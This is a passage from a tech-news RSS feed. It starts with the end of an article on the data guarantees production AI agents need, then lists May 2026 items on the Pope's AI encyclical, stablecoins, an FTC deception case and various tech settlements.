<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.infoworld.com/article/3611465/how-ai-agents-will-transform-the-future-of-work.html" data-type="link" data-id="https://www.infoworld.com/article/3611465/how-ai-agents-will-transform-the-future-of-work.html">AI agents</a> look brilliant in a demo because demos are friendly worlds. The data is curated, the tools behave, and nothing important changes while the agent is in mid-thought. Production is the opposite: data arrives late, facts conflict, permissions bite, APIs time out, and the underlying state changes constantly.</p>



<p>That gap is why early “agents in production” often get scoped down to something safer: read-only assistants, human-in-the-loop workflows, or narrow domains with heavily curated data. Several high-profile deployments have also been scaled back after meeting messy real-world constraints. Rather than being a verdict on autonomy, these stumbles are a reminder that autonomy is unforgiving. Small cracks in your data stack become large cracks in agent behavior.</p>



<p>The same pattern shows up whenever agents move from toy workflows to systems with real state. As scope increases, weak guarantees create predictable symptoms: overconfident actions on stale data, brittle reasoning when meaning drifts, and compounding errors once the agent can write back.</p>



<p>The fix is to treat agents as what they are: systems that read, reason, and write against live operational data. That pushes you into establishing guarantees that most enterprise stacks provide only implicitly. Four matter more than the rest: freshness, semantics, safe write paths and lineage.</p>



<h2 class="wp-block-heading">Freshness: Stop reasoning about yesterday</h2>



<p>Many organizations have learned to live with staleness: batch pipelines, replica lag, caches, delayed CDC (change data capture), materialized views. Humans compensate with judgment. Agents compensate with confidence.</p>



<p>A common production failure mode is correct reasoning on the wrong time slice. The agent reads inventory that is minutes behind and triggers a reorder that collides with replenishment already in flight. Or the agent sees an incident marked “resolved” in one system while another system still shows the rollback pending, and it proceeds with a change that should have waited. Call these mistakes what they are: freshness bugs.</p>



<p>A “freshness guarantee” means time is first class. Facts have timestamps. Queries support clean “as of” semantics, so an agent can ask what was true at time T, what is true now, and what changed since its last action. Workflows declare freshness SLOs for the data they depend on. When the platform cannot meet them, the agent degrades gracefully. It pauses, asks for confirmation, or switches to a read-only plan.</p>



<p>Freshness also has a deployment dimension. Many agent use cases are local by nature, from factories to retail sites. If you need low-latency context, pushing everything back to a central store and waiting for it to come round the loop is a design flaw, not an optimization problem.</p>



<h2 class="wp-block-heading">Semantics: Make meaning explicit, not inferred</h2>



<p>Agents fail in subtler ways when the data looks right but means different things across systems. Customer versus account. Order versus transaction. A status code that drifted between teams. Duplicate identifiers. Inconsistent naming. Each system can be locally correct while the agent is globally wrong.</p>



<p>This is where teams reach for vector search and call it memory. Embeddings are excellent for similarity. They are weak at representing complex structure and constraints. In practice, similarity can help you find relevant material but it does not give you a semantic contract. It cannot enforce that “this customer” is the same entity across CRM, billing, support, and identity systems. It cannot naturally encode constraints like “a device belongs to exactly one site at a time” or “a refund requires a matching settlement.” When agents rely on fuzzy recall to do deterministic work, they behave like confident improvisers.</p>



<p>A semantic guarantee means an explicit model of entities and relationships, often a “context graph” that links operational records to the documents and signals that describe them. This is a shift from older knowledge graph programs that imported data in batches for analytical queries. The emerging agent use case is constant streaming of data, much of it documents and files, combined with real-time read and write in the same operational loop.</p>



<h2 class="wp-block-heading">Safe write paths: Agents make changes, so design for reversibility</h2>



<p>Read-only agents can be wrong and still be useful. Write-capable agents can be wrong and destructive. The compounding effect is the risk that a mistaken update becomes the next step’s ground truth, a retry becomes a duplicate side effect, and a partial write leaves the world inconsistent.</p>



<p>Safe write paths begin with transactional guarantees. ACID transactions keep state transitions coherent. Idempotency matters because agents retry and networks wobble. Concurrency control matters because the agent is rarely the only actor changing state. Then come guardrails: row-level security, role-based access, and constraints enforced by the platform, rather than buried in prompts.</p>



<p>A practical pattern is plan-validate-commit. The agent proposes a structured change set, validates it against current state and constraints, then commits with an audit record that links action to evidence. Approval can be automated or human depending on risk, but the write path stays disciplined.</p>



<h2 class="wp-block-heading">Lineage: If you cannot trace decisions, you cannot improve them</h2>



<p>When an agent goes wrong, teams need to answer a simple question: what did it see? Without that, debugging becomes archaeology.</p>



<p>Lineage connects data to behavior. It includes provenance for records and documents, plus agent-specific traces: which retrieval results were used, which tool calls ran, which policies were applied, and what changed as a result. An AI-native platform should make it practical to capture and query this. It should include immutable audit trails for high-risk actions, versioning or time travel for critical entities, and links from decisions to the exact data snapshots used. This is also how evaluation becomes engineering: through replayable scenarios, regression tests, and drift detection.</p>



<h2 class="wp-block-heading">What an AI-native data platform provides</h2>



<p>These four guarantees point to the same conclusion: agentic workloads punish fragmentation. Every extra datastore, index, and pipeline is another place for semantics to drift and freshness to fail. Agents end up stitching together five systems at runtime, and runtime stitching is where consistency dies. Because agents operate across these systems continuously, not occasionally, they amplify integration flaws.</p>



<p>An AI-native data platform is a foundation that can represent operational truth, semantic context, and retrieval signals in one place, with transactional correctness, controlled writes, and auditable history. That typically means native support for all of the data shapes agents need in the same workflow: relational records, JSON documents, graph relationships, time-series events, and vector embeddings. It also means support for composable queries that can blend structured filters, relationship traversal, and similarity search without shipping data across services.</p>



<p>The other requirement is deployment flexibility. The data plumbing tends to move slower than the front-end UX, because shiny interfaces are easier to understand than the hard work of making systems consistent at scale. Agents bring that plumbing problem to the surface. Platforms that can run the same engine in the cloud, in self-hosted environments, in memory, and at the edge reduce orchestration overhead and make guarantees easier to maintain.</p>



<h2 class="wp-block-heading">Where to start: An engineer’s agent readiness checklist</h2>



<p>Full autonomy rarely needs to be the starting point. Explicit guarantees do.</p>



<p>Start with read paths. Prove retrieval quality, freshness bounds, and semantic coherence while the agent is advisory. Define a context contract: authoritative sources, entity resolution rules, the relationships that matter, and what “fresh enough” means for each workflow. Instrument lineage by default so every recommendation can be traced to evidence.</p>



<p>Introduce writes gradually. Scope early actions to reversible operations. Make tool calls idempotent. Use transactions. Keep enforcement in the platform layer. Treat approvals as a tunable control, with human sign-off where risk and blast radius demand it.</p>



<p>Agents disappoint in production when we ask them to drive on roads built for dashboards. Build the four guarantees into the substrate and the same model will start behaving like a far more reliable system. That is the unglamorous truth behind “agent memory” and “context graphs.” This is infrastructure work, but it is also the shortest path from demos to deployment.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dienstag: Papst thematisiert KI, Trump stoppt wichtige KI-Verordnung]]></title>
<description><![CDATA[Enzyklika von Papst Leo XIV. + KI-Verordnung vorerst auf Eis + Tether mit neuem Stablecoin + Meta macht Reddit Konkurrenz + Porsche baut den Konzern um]]></description>
<link>https://tsecurity.de/de/3546825/it-nachrichten/dienstag-papst-thematisiert-ki-trump-stoppt-wichtige-ki-verordnung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546825/it-nachrichten/dienstag-papst-thematisiert-ki-trump-stoppt-wichtige-ki-verordnung/</guid>
<pubDate>Tue, 26 May 2026 06:32:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Enzyklika von Papst Leo XIV. + KI-Verordnung vorerst auf Eis + Tether mit neuem Stablecoin + Meta macht Reddit Konkurrenz + Porsche baut den Konzern um]]></content:encoded>
</item>
<item>
<title><![CDATA[Tether: Offizieller Stablecoin in Georgien vor der Einführung]]></title>
<description><![CDATA[Die Kryptowährungsplattform Tether wird in Georgien einen offiziellen Stablecoin einführen, der an die Landeswährung gekoppelt ist.]]></description>
<link>https://tsecurity.de/de/3546763/it-nachrichten/tether-offizieller-stablecoin-in-georgien-vor-der-einfuehrung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546763/it-nachrichten/tether-offizieller-stablecoin-in-georgien-vor-der-einfuehrung/</guid>
<pubDate>Tue, 26 May 2026 05:46:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Kryptowährungsplattform Tether wird in Georgien einen offiziellen Stablecoin einführen, der an die Landeswährung gekoppelt ist.]]></content:encoded>
</item>
<item>
<title><![CDATA[Tether: Offizieller Stablecoin in Georgien vor der Einführung]]></title>
<description><![CDATA[Die Kryptowährungsplattform Tether wird in Georgien einen offiziellen Stablecoin einführen, der an die Landeswährung gekoppelt ist.]]></description>
<link>https://tsecurity.de/de/3546756/it-nachrichten/tether-offizieller-stablecoin-in-georgien-vor-der-einfuehrung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546756/it-nachrichten/tether-offizieller-stablecoin-in-georgien-vor-der-einfuehrung/</guid>
<pubDate>Tue, 26 May 2026 05:31:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Kryptowährungsplattform Tether wird in Georgien einen offiziellen Stablecoin einführen, der an die Landeswährung gekoppelt ist.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Guardian view on the Pope and Claude: Leo XIV’s encyclical on AI is right to put humanity first | Editorial]]></title>
<description><![CDATA[In calling for regulation of the digital revolution, and foregrounding human dignity, the pontiff has contributed to a crucial ethical debateWhen the present pope adopted his regnal name, he explained the choice by reference to a 19th-century predecessor who used the papacy to address the great s...]]></description>
<link>https://tsecurity.de/de/3546092/ai-nachrichten/the-guardian-view-on-the-pope-and-claude-leo-xivs-encyclical-on-ai-is-right-to-put-humanity-first-editorial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546092/ai-nachrichten/the-guardian-view-on-the-pope-and-claude-leo-xivs-encyclical-on-ai-is-right-to-put-humanity-first-editorial/</guid>
<pubDate>Mon, 25 May 2026 19:31:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In calling for regulation of the digital revolution, and foregrounding human dignity, the pontiff has contributed to a crucial ethical debate</p><p>When the present pope adopted his regnal name, he explained the choice by reference to a 19th-century predecessor who used the papacy to address the great social question of his time. In the 1891 encyclical, <a href="https://www.vatican.va/content/leo-xiii/en/encyclicals/documents/hf_l-xiii_enc_15051891_rerum-novarum.html"><em>Rerum Novarum</em></a> (Of New Things), Pope Leo XIII analysed the social forces unleashed by the Industrial Revolution, and outlined principles for a just settlement between the forces of capital and labour. Leo XIV hopes to do something similar in relation to the accelerating digital upheaval of our own age.</p><p>As anxiety grows over big tech’s impact on how we work and live, such ambition should be applauded. The early fruits of the pope’s work were <a href="https://www.theguardian.com/world/2026/may/25/pope-leo-encyclical-ai-artificial-intelligence-slavery">presented</a> in the Vatican on Monday after the publication of his first encyclical, <a href="https://www.vatican.va/content/leo-xiv/en/encyclicals/documents/20260515-magnifica-humanitas.html"><em>Magnifica Humanitas</em></a> (Magnificent Humanity). In 42,000 or so words the document itemises the daunting challenges posed by developments in artificial intelligence, and urges political leaders to safeguard human dignity as new technologies emerge at a pace which is outstripping ethical regulation and control.</p> <a href="https://www.theguardian.com/commentisfree/2026/may/25/the-guardian-view-on-the-pope-and-claude-encyclical-on-ai-is-right-to-put-humanity-first">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tether will launch an 'official' stablecoin in Georgia tied to local currency]]></title>
<description><![CDATA[The new cryptocurrency will be called GELT and will represent the Georgian Lari.]]></description>
<link>https://tsecurity.de/de/3545927/it-nachrichten/tether-will-launch-an-official-stablecoin-in-georgia-tied-to-local-currency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545927/it-nachrichten/tether-will-launch-an-official-stablecoin-in-georgia-tied-to-local-currency/</guid>
<pubDate>Mon, 25 May 2026 17:47:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The new cryptocurrency will be called GELT and will represent the Georgian Lari.]]></content:encoded>
</item>
<item>
<title><![CDATA[FTX Law Firm Fenwick & West Agrees to $54 Million Settlement With Customers]]></title>
<description><![CDATA[Fenwick & West LLP, the law firm that advised collapsed crypto exchange FTX, has agreed to pay $54 million to settle a class action lawsuit filed by former users. The firm was accused of helping FTX conceal the misuse of customer funds and facilitating legal structures tied to the exchange’s oper...]]></description>
<link>https://tsecurity.de/de/3545320/it-nachrichten/ftx-law-firm-fenwick-west-agrees-to-54-million-settlement-with-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545320/it-nachrichten/ftx-law-firm-fenwick-west-agrees-to-54-million-settlement-with-customers/</guid>
<pubDate>Mon, 25 May 2026 12:16:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fenwick &amp; West LLP, the law firm that advised collapsed crypto exchange FTX, has agreed to pay $54 million to settle a class action lawsuit filed by former users. The firm was accused of helping FTX conceal the misuse of customer funds and facilitating legal structures tied to the exchange’s operations.]]></content:encoded>
</item>
<item>
<title><![CDATA[Do You Own an Android Phone? Claim a Part of Google's $135M Data Harvesting Settlement Soon]]></title>
<description><![CDATA[Google's settlement with Android users would resolve the lawsuit and alter how the company manages its terms of service, though not all users will receive financial compensation.]]></description>
<link>https://tsecurity.de/de/3543666/it-nachrichten/do-you-own-an-android-phone-claim-a-part-of-googles-135m-data-harvesting-settlement-soon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3543666/it-nachrichten/do-you-own-an-android-phone-claim-a-part-of-googles-135m-data-harvesting-settlement-soon/</guid>
<pubDate>Sun, 24 May 2026 15:32:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google's settlement with Android users would resolve the lawsuit and alter how the company manages its terms of service, though not all users will receive financial compensation.]]></content:encoded>
</item>
<item>
<title><![CDATA[Xfinity Customers Still Have Time to Claim a Part of Comcast's $117.5M Data Breach Settlement]]></title>
<description><![CDATA[The settlement claim period has been extended. Here's how to file before the Sept. 14 deadline.]]></description>
<link>https://tsecurity.de/de/3539445/it-nachrichten/xfinity-customers-still-have-time-to-claim-a-part-of-comcasts-1175m-data-breach-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3539445/it-nachrichten/xfinity-customers-still-have-time-to-claim-a-part-of-comcasts-1175m-data-breach-settlement/</guid>
<pubDate>Fri, 22 May 2026 14:01:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The settlement claim period has been extended. Here's how to file before the Sept. 14 deadline.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-Powered Marketing Service “Active Listening” Deceived Customers: FTC]]></title>
<description><![CDATA[The pitch for "Active Listening," an AI-powered advertising service that listened to consumers' real-world conversations through their smartphones and smart speakers and delivered targeted ads to those people within precise geographic areas, with consumers consent, was extremely compelling, but u...]]></description>
<link>https://tsecurity.de/de/3539346/it-security-nachrichten/ai-powered-marketing-service-active-listening-deceived-customers-ftc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3539346/it-security-nachrichten/ai-powered-marketing-service-active-listening-deceived-customers-ftc/</guid>
<pubDate>Fri, 22 May 2026 13:39:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="533" src="https://thecyberexpress.com/wp-content/uploads/Active-Listening.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Active Listening, FTC, FTC Ruling, AI-Powered Marketing, Ai-Powered" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Active-Listening.webp 800w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Active-Listening.webp 800w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Active-Listening-750x500.webp 750w" sizes="(max-width: 800px) 100vw, 800px" title="AI-Powered Marketing Service “Active Listening” Deceived Customers: FTC 1"></p><p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The pitch for "Active Listening," an AI-powered advertising service that listened to consumers' real-world conversations through their smartphones and smart speakers and delivered targeted ads to those people within precise geographic areas, with consumers consent, was extremely compelling, but until it wasn't really what it claimed.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The Federal Trade Commission will require Cox Media Group and two smaller marketing firms to pay a total of $930,000 to settle allegations they deceived customers by falsely claiming to offer an AI-powered service that could target localized ads based on conversations captured from consumers' smart devices and that consumers had opted into such targeting.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">"Not only did the product these companies marketed not do what they claimed it did, but they also misled potential customers by claiming consumers had opted into this service when it's clear they did not," <a href="https://www.ftc.gov/news-events/news/press-releases/2026/05/ftc-require-cox-media-group-two-other-firms-pay-nearly-1-million-settle-charges-they-deceived" target="_blank" rel="nofollow noopener">said</a> Christopher Mufarrige, Director of the FTC's Bureau of Consumer Protection.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Every material element of that pitch was false.</p>

<h5>Also read: <a href="https://thecyberexpress.com/ftc-probes-ai-chatbots-designed-as-companions/">FTC Probes AI Chatbots Designed as “Companions” for Children’s Safety</a></h5>
<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>Was 'Active Listening' Actually Being Sold</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The case centers on a marketing product introduced in 2023 that CMG sold to local businesses. Through presentations, website materials and sales pitches, the company promoted "Active Listening" as a way for advertisers to identify potential customers at the precise moment they were discussing products or services around smart devices.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">According to the complaints, this service did not, in fact, listen in on consumers' conversations or use voice <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28427">data</a> at all and neither did the service accurately place ads in customers' desired locations. Instead, the service the companies provided consisted of reselling — at a significant markup — email lists obtained from other data brokers.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">FTC investigators say the service was pitched as a breakthrough tool powered by "voice data" and AI. According to the government, CMG told clients its technology partner could aggregate and analyze voice data from smartphones, tablets and other devices to determine when consumers were in the market for particular products. When prospective clients pressed sales representatives on how exactly the technology worked, FTC filings say sales presentations became increasingly specific when potential customers questioned how the technology worked.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>The Consent Fabrication</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The fraudulent capability claim was compounded by a fraudulent consent claim. The companies told prospective clients that consumers had "opted in" to the Active Listening service. In fact, no consent was ever sought or obtained. The companies characterized routine click-through acceptance of app terms of service as affirmative opt-in consent to the collection of voice data — a characterization the FTC flatly rejected.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">This consent fabrication mattered legally in both directions. It deceived the businesses buying the service into believing they were running a legally compliant targeted advertising campaign. And it obscured from consumers that their conversations were purportedly being harvested and monetized — which those consumers had never agreed to.</p>

<h5>Also read: <a href="https://thecyberexpress.com/ftc-takes-action-against-adobe/">FTC Sues Adobe for ‘Trapping’ Users in Deceptive Subscription Practices</a></h5>
<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>The FTC's Bluntest Finding</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The most pointed element of the FTC's action is not the settlement amount. It is the Commission's explicit statement that the illegality ran deeper than the <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28428">fraud</a> itself.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The Commission noted that, had the service actually functioned as advertised, collecting voice data from consumers' homes without genuine consent would itself have violated Section 5 of the FTC Act. In other words, CMG and its partners were not just selling a fake product. They were selling a fake version of something that would have been illegal to sell as real.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>Who Pays and Who Supplied the Deception</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Under the proposed consent orders, CMG must pay $880,000, while MindSift and 1010 Digital Works will each pay $25,000. The funds will be used to provide redress to CMG customers harmed by the practices. MindSift and 1010 Digital Works also face a second count for providing CMG with the "means and instrumentalities" to deceive customers through misleading marketing materials and sales presentations.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The Active Listening enforcement action arrives at a moment when AI capability claims are proliferating faster than any regulator can evaluate them. Aattaching the phrase "AI-powered" to a product does not immunize that product from consumer protection law, and fabricating both technical capability and consumer consent simultaneously creates compounding liability — not just for the company selling the product but for the partners who built the sales materials that made the deception work.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One of Meta’s big legal reckonings just ended in a settlement]]></title>
<description><![CDATA[After back-to-back losses in trials grappling with its impact on teens' mental health, Meta just settled what was supposed to be its next legal battle with Kentucky's Breathitt County School District. Google's YouTube, Snap, and TikTok all recently settled similar claims brought by the school dis...]]></description>
<link>https://tsecurity.de/de/3537546/it-nachrichten/one-of-metas-big-legal-reckonings-just-ended-in-a-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3537546/it-nachrichten/one-of-metas-big-legal-reckonings-just-ended-in-a-settlement/</guid>
<pubDate>Thu, 21 May 2026 21:02:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After back-to-back losses in trials grappling with its impact on teens' mental health, Meta just settled what was supposed to be its next legal battle with Kentucky's Breathitt County School District. Google's YouTube, Snap, and TikTok all recently settled similar claims brought by the school district, which was seeking payment from the companies to cover […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Used an Android Phone After 2017? You Might Get Part of Google's $135 Million Settlement]]></title>
<description><![CDATA[Millions of Android owners could receive a payment of up to $100.]]></description>
<link>https://tsecurity.de/de/3534765/it-nachrichten/used-an-android-phone-after-2017-you-might-get-part-of-googles-135-million-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534765/it-nachrichten/used-an-android-phone-after-2017-you-might-get-part-of-googles-135-million-settlement/</guid>
<pubDate>Thu, 21 May 2026 03:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Millions of Android owners could receive a payment of up to $100.]]></content:encoded>
</item>
<item>
<title><![CDATA[AIB, Bank of Ireland join group pushing for euro stablecoin]]></title>
<description><![CDATA[Qivalis plans for a market launch in the second half of 2026.
Read more: AIB, Bank of Ireland join group pushing for euro stablecoin]]></description>
<link>https://tsecurity.de/de/3533441/it-nachrichten/aib-bank-of-ireland-join-group-pushing-for-euro-stablecoin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3533441/it-nachrichten/aib-bank-of-ireland-join-group-pushing-for-euro-stablecoin/</guid>
<pubDate>Wed, 20 May 2026 16:48:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Qivalis plans for a market launch in the second half of 2026.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/business/aib-bank-of-ireland-join-qivalis-group-pushing-for-euro-stablecoins">AIB, Bank of Ireland join group pushing for euro stablecoin</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Democrats preview how they’d go after the Ticketmaster settlement if they regain power]]></title>
<description><![CDATA[A handful of Democrats called an unofficial hearing on Capitol Hill Monday to slam the Department of Justice's "trivial" and "pathetic" settlement with Live Nation-Ticketmaster, previewing how they might go after Trump administration antitrust deals if they win back congressional power in Novembe...]]></description>
<link>https://tsecurity.de/de/3530715/it-nachrichten/democrats-preview-how-theyd-go-after-the-ticketmaster-settlement-if-they-regain-power/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530715/it-nachrichten/democrats-preview-how-theyd-go-after-the-ticketmaster-settlement-if-they-regain-power/</guid>
<pubDate>Tue, 19 May 2026 22:17:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A handful of Democrats called an unofficial hearing on Capitol Hill Monday to slam the Department of Justice's "trivial" and "pathetic" settlement with Live Nation-Ticketmaster, previewing how they might go after Trump administration antitrust deals if they win back congressional power in November. While the DOJ settlement with Live Nation, which came one week into […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Bank of England Pushes for Near 24/7 Settlement System for Tokenised Finance]]></title>
<description><![CDATA[The Bank of England and the Financial Conduct Authority have proposed extending settlement system operating hours to near-24/7 availability as part of efforts to prepare the UK’s wholesale markets for tokenised finance. The move could support cross-border payments, digital asset settlements, and ...]]></description>
<link>https://tsecurity.de/de/3528669/it-nachrichten/bank-of-england-pushes-for-near-247-settlement-system-for-tokenised-finance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3528669/it-nachrichten/bank-of-england-pushes-for-near-247-settlement-system-for-tokenised-finance/</guid>
<pubDate>Tue, 19 May 2026 12:17:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Bank of England and the Financial Conduct Authority have proposed extending settlement system operating hours to near-24/7 availability as part of efforts to prepare the UK’s wholesale markets for tokenised finance. The move could support cross-border payments, digital asset settlements, and broader adoption of distributed ledger technologies.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Settles “More Personalized” Siri Delay Lawsuit for $250 Million]]></title>
<description><![CDATA[Apple will pay $250 million to settle a class-action lawsuit over delayed Siri features. Owners of iPhone 15 Pro and iPhone 16 models purchased between June 2024 and March 2025 may receive $25–$95 per device. Here’s how the math works out.Read original article]]></description>
<link>https://tsecurity.de/de/3527319/ios-mac-os/apple-settles-more-personalized-siri-delay-lawsuit-for-250-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527319/ios-mac-os/apple-settles-more-personalized-siri-delay-lawsuit-for-250-million/</guid>
<pubDate>Mon, 18 May 2026 22:54:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple will pay $250 million to settle a class-action lawsuit over delayed Siri features. Owners of iPhone 15 Pro and iPhone 16 models purchased between June 2024 and March 2025 may receive $25–$95 per device. Here’s how the math works out.<p><strong><a href="https://www.macrumors.com/2026/05/05/apple-class-action-siri-lawsuit-settlement/">Read original article</a></strong></p><p><a href="https://tidbits.com/2016/07/11/os-x-hidden-treasures-typing-exotic-characters/"><picture><source srcset="https://tidbits.com/uploads/2018/05/TB-Special-Characters-ad-640x200.png" media="(max-width: 600px)" type="image/png"><img src="https://tidbits.com/uploads/2018/05/TB-Special-Characters-ad-1456x180.png" srcset="https://tidbits.com/uploads/2018/05/TB-Special-Characters-ad-1456x180.png 1456w, https://tidbits.com/uploads/2018/05/TB-Special-Characters-ad-1456x180-640x79.png 640w" alt="macOS Hidden Treasures: Typing Exotic Characters"></picture></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Authors fight for higher payouts from Anthropic’s $1.5B copyright settlement]]></title>
<description><![CDATA[Lawyers accused of rushing historic settlement to seize $320 million in fees.]]></description>
<link>https://tsecurity.de/de/3520895/ai-nachrichten/authors-fight-for-higher-payouts-from-anthropics-15b-copyright-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3520895/ai-nachrichten/authors-fight-for-higher-payouts-from-anthropics-15b-copyright-settlement/</guid>
<pubDate>Sat, 16 May 2026 00:03:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lawyers accused of rushing historic settlement to seize $320 million in fees.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: AI Threat Escalation, Ransomware Disruption, Supply Chain Attacks, and Expanding Cybersecurity Risks]]></title>
<description><![CDATA[In this weekly roundup from The Cyber Express, the global cybersecurity landscape in 2026 continues to shift rapidly as emerging technologies and evolving cyber threats reshape the digital environment. Governments are increasing oversight of artificial intelligence and data practices, while ranso...]]></description>
<link>https://tsecurity.de/de/3519491/it-security-nachrichten/the-cyber-express-weekly-roundup-ai-threat-escalation-ransomware-disruption-supply-chain-attacks-and-expanding-cybersecurity-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3519491/it-security-nachrichten/the-cyber-express-weekly-roundup-ai-threat-escalation-ransomware-disruption-supply-chain-attacks-and-expanding-cybersecurity-risks/</guid>
<pubDate>Fri, 15 May 2026 13:38:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
